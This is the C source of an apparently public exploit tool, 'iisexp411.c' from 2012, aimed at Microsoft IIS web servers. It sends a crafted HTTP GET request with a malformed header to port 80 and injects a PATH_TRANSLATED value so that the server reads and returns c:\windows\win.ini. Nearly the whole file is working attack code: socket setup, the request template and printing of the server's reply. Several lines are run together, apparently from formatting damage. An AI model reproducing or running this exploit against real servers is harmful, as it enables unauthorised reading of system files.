usage: iisexp411 127.0.0.1 /AprilFools'Day.php PATH_TRANSLATED c:\windows\

1. usage:
2. iisexp411 127.0.0.1 /AprilFools'Day.php PATH_TRANSLATED c:\windows\win.ini
3.  
4. /* iisexp41.c ver4.1 copy by @yuange1975 2012.4.1
5. iisexp411.c ver4.1.1 copy by @yuange1975 2012.4.2
6.  
7. 1.Changing the input parameters 2.To increase the receive data
8.  
9. 假作真时真亦假。True Mingled also false.
10. http://weibo.com/yuange1975
11. http://twitter.com/yuange75
12. http://hi.baidu.com/yuange1975/blog/item/ac368655017819dbb745aeee.html
13. */
14. #include <stdio.h>
15. #include <stdlib.h>#include <winsock2.h>
16. #include <windows.h>
17. #include <mswsock.h>
18. #include <wsnwlink.h>
19. #include <ws2tcpip.h>
20. #include <process.h> /* _beginthread, _endthread */
21. #include <errno.h>
22. #include <io.h>
23. #include <conio.h>#pragma comment(lib,"ws2_32")
24. #pragma comment(lib,"Mswsock")/*
25. char *AprilFoolsDay ="GET /AprilFools'Day.php HTTP/1.1\r\nHOST:weibo.com/yuange1975\r\na=b\nc:shellcode\r\n\r\n";
26. */
27. char *AprilFoolsDay ="GET %s HTTP/1.1\r\nHOST:%s\r\na=b\n%s:%s\r\n\r\n"; static unsigned int maybe_lookup_host(char*
28. name)
29. {
30. unsigned long ulAddr = INADDR_NONE; /* Don't bother resolving raw IP addresses, naturally. */
31. ulAddr = inet_addr((char*)name);
32. if ( ulAddr != INADDR_NONE && ulAddr != INADDR_ANY )
33. return (unsigned int)ulAddr; return 0;
34. }int do_exp(char *hostname,unsigned int port,char *AprilFools, char *c,char *shellcode)
35. {
36. SOCKET hScoket = INVALID_SOCKET;
37. struct sockaddr_in sin;
38. unsigned int addr=0;
39. int write_res = 0;
40. int read_res = 0;
41. char crash_buf[0x4000];
42. int crash_buflen=0;
43. /*
44. create SOCKET
45. */
46. hScoket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0/*WSA_FLAG_OVERLAPPED*/);
47. if (hScoket == INVALID_SOCKET) {
48. printf_s("WSASocket function failed with error = %d\n", WSAGetLastError() );
49. return -1;
50. } /* Resolved IP address */
51. addr = maybe_lookup_host(hostname); sin.sin_family = AF_INET;
52. sin.sin_port = htons(port);
53. memcpy(&sin.sin_addr,&addr,4); /*
54. connect
55. */
56. if ( connect(hScoket, (struct sockaddr*) &sin, sizeof(struct sockaddr_in) ) == SOCKET_ERROR) {
57. if ( WSAEWOULDBLOCK != WSAGetLastError() ) {
58. closesocket(hScoket);
59. printf_s("connect function failed with error: %ld\n", WSAGetLastError());
60. return -1;
61. }
62. }
63.  
64. printf("[*] connected to %s:%d\n",hostname,port);
65.  
66. //build_crash_package(&crash_buf,&crash_buflen);
67. sprintf_s(crash_buf,0x400,AprilFoolsDay,AprilFools,hostname,c,shellcode);
68. crash_buflen = strlen(crash_buf); //printf("%s",crash_buf);
69. /*
70. send data to remote target
71. */
72. write_res = send( hScoket,
73. crash_buf,
74. crash_buflen,
75. 0);
76.  
77. printf("[*] send %d bytes\n\n",write_res);
78. while(1){
79. read_res = recv( hScoket,
80. crash_buf,
81. 0x4000-1,
82. 0);
83. if(read_res<=0) break;
84. crash_buf[read_res]=0;
85. printf("%s",crash_buf);
86. } closesocket(hScoket);
87. return 0;
88. }int main(int argc, const char **argv)
89. {
90. int iResult;
91. char * target_ip = (char*)argv[1];
92. char *AprilFools="/AprilFools'Day.php";
93. char *c="c";
94. char *shellcode="shellcode";
95. WSADATA wsaData; if ( !target_ip || argc < 2 ) {
96. printf_s("usage: <target_ip> /AprilFools'Day.php c shellcode \n");
97. return 0;
98. }
99. if(argc>2) AprilFools=(char*)argv[2];
100. if(argc>3) c= (char*)argv[3];
101. if(argc>4) shellcode=(char*)argv[4];
102.  
103.  
104. /* Initialize Winsock */
105. iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
106. if (iResult != 0) {
107. printf_s("WSAStartup failed: %d\n", iResult);
108. return -1;
109. } do_exp(target_ip,80,AprilFools,c,shellcode);
110.  
111. /* clean - win socket */
112. WSACleanup(); return 0;
113. }